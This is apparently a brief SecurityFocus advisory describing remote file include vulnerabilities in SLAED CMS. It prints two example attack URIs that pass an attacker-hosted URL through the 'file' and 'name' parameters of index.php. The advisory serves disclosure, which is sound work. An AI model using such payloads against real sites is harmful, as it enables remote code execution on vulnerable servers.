SLAED CMS Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/sd/index.php?file=http://attacker's site

http://www.example.com/sd/index.php?name=http://attacker's site


 

Privacy Statement
Copyright 2010, SecurityFocus